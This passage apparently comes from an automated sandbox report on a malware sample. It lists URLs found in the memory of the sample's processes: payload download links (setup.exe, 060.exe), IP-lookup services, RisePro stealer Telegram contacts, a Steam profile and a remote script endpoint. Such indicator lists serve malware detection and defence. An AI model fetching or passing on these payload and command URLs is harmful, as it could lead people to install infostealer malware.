Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=2VoZa2M8Wh3k&
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&
Source: RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV
Source: RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
Source: RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/toolt
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2549795931.0000000001266000.00000004.00000020.00020000.00000000.sdmp, ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3136763184.00000000018EC000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2540342471.0000000001514000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://db-ip.com/
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3136763184.00000000018EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://db-ip.com/O
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2549795931.0000000001266000.00000004.00000020.00020000.00000000.sdmp, ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3136763184.00000000018EC000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2540342471.0000000001514000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://db-ip.com/demo/home.php?s=149.18.24.96
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2540342471.0000000001514000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://db-ip.com/demo/home.php?s=149.18.24.96S
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3136763184.00000000018EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://db-ip.com/demo/home.php?s=149.18.24.96crS
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2540342471.0000000001514000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://db-ip.com/demo/home.php?s=149.18.24.96mx4(
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3136763184.00000000018EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://db-ip.com/demo/home.php?s=149.18.24.96t
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2549795931.0000000001266000.00000004.00000020.00020000.00000000.sdmp, ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3136763184.00000000018EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://db-ip.com/demo/home.php?s=149.18.24.96z
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2549795931.000000000125F000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2540342471.0000000001514000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://db-ip.com:443/demo/home.php?s=149.18.24.96
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3136763184.000000000184E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://db-ip.com:443/demo/home.php?s=149.18.24.96X
Source: WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dod.fastbutters.com/style/060.exe
Source: WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dod.fastbutters.com:80/style/060.exe
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2397250157.0000000005E9E000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2378223753.0000000005E88000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2378676835.0000000005FEA000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2399977559.0000000006027000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2394268324.0000000006009000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2397250157.0000000005E9E000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2378223753.0000000005E88000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2378676835.0000000005FEA000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2399977559.0000000006027000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2394268324.0000000006009000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2397250157.0000000005E9E000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2378223753.0000000005E88000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2378676835.0000000005FEA000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2399977559.0000000006027000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2394268324.0000000006009000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: WlCIinu0yp.exe, 00000000.00000003.1737664067.0000000004232000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1738878469.00000000041E3000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1738688271.0000000004232000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://f.123654987.xyz/525403/setup.exe
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2540342471.00000000014C2000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2540342471.0000000001514000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2549795931.0000000001221000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/DF
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2549795931.0000000001266000.00000004.00000020.00020000.00000000.sdmp, ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3136763184.00000000018D3000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2540342471.0000000001506000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/Mozilla/5.0
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2547218346.0000000000515000.00000002.00000001.01000000.00000006.sdmp, ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3123029988.0000000000901000.00000040.00000001.01000000.0000000C.sdmp, H14SDf_AWcPvvQK5Xx97sISX.exe, 00000010.00000002.3125680466.0000000000516000.00000002.00000001.01000000.00000011.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2538050137.0000000000515000.00000002.00000001.01000000.00000014.sdmp	String found in binary or memory: https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2540342471.00000000014DB000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2540342471.0000000001506000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/widget/demo/149.18.24.96
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3136763184.00000000018D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/widget/demo/149.18.24.960
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3136763184.000000000188A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/widget/demo/149.18.24.963
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3136763184.00000000018BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/widget/demo/149.18.24.96=s$
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2549795931.0000000001266000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/widget/demo/149.18.24.96L
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2540342471.00000000014F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/z
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2549795931.0000000001266000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2540342471.0000000001506000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io:443/widget/demo/149.18.24.96
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3136763184.000000000184E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io:443/widget/demo/149.18.24.96es(x86)=C:
Source: WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://monoblocked.com/
Source: WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://monoblocked.com/525403/setup.exe
Source: WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://monoblocked.com/525403/setup.exeom/
Source: WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://monoblocked.com/525403/setup.exexeN
Source: WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://monoblocked.com/R
Source: WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://monoblocked.com:80/525403/setup.exe
Source: WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://monoblocked.com:80/525403/setup.exeN
Source: WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://monoblocked.com:80/525403/setup.exeY
Source: is-280SC.tmp.25.dr	String found in binary or memory: https://sectigo.com/CPS0
Source: WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sextipolar.sbs/
Source: WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sextipolar.sbs/Z
Source: WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sextipolar.sbs/b
Source: WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1727787269.0000000004235000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1737664067.0000000004232000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1729308651.0000000004235000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002C14000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1731760692.0000000004235000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sextipolar.sbs/qwqw
Source: WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sextipolar.sbs/qwqwe
Source: WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002C1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sextipolar.sbs/qwqwedirectOM
Source: WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sextipolar.sbs/qwqwq
Source: RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3132751366.0000000000E55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/G
Source: RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199680449169
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: 9RJ0JeM9uj2rfsuq_woBmmIY.exe, 00000015.00000002.1951214705.0000000000E29000.00000004.00000001.01000000.00000012.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3132751366.0000000000E55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199680449169
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199680449169/badges
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199680449169/inventory/
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199680449169V
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/e
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2397504517.0000000005FD1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2397504517.0000000005FD1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2376756856.0000000005E77000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2396715290.0000000005E8D000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2379052990.0000000005FD9000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2397820481.0000000006005000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.000000000056C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.000000000052E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2376756856.0000000005E77000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2396715290.0000000005E8D000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2379052990.0000000005FD9000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2397820481.0000000006005000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.000000000056C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.000000000052E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: RegAsm.exe, 00000017.00000002.3121845008.000000000056C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17ontdrvhost.exe
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2552343455.0000000005E54000.00000004.00000020.00020000.00000000.sdmp, ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3136763184.000000000184E000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2542152281.0000000005F92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/RiseProSUPPORT
Source: 9RJ0JeM9uj2rfsuq_woBmmIY.exe, 00000015.00000002.1951214705.0000000000E29000.00000004.00000001.01000000.00000012.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/r1g1o
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3136763184.00000000018EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/risepro
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2540342471.0000000001514000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/risepro_bot
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3136763184.00000000018EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/risepro_bot.96
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2540342471.0000000001514000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/risepro_bot9x
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3136763184.00000000018EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/risepro_botQ=
Source: ydYqwUL3GNS6IHkMgIteny78.exe, 00000009.00000002.2733749544.000001C5001C1000.00000004.00000800.00020000.00000000.sdmp, ydYqwUL3GNS6IHkMgIteny78.exe, 00000009.00000002.2733749544.000001C5001AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://thridparty.nservices.org/api/browser/GetScript?id=$
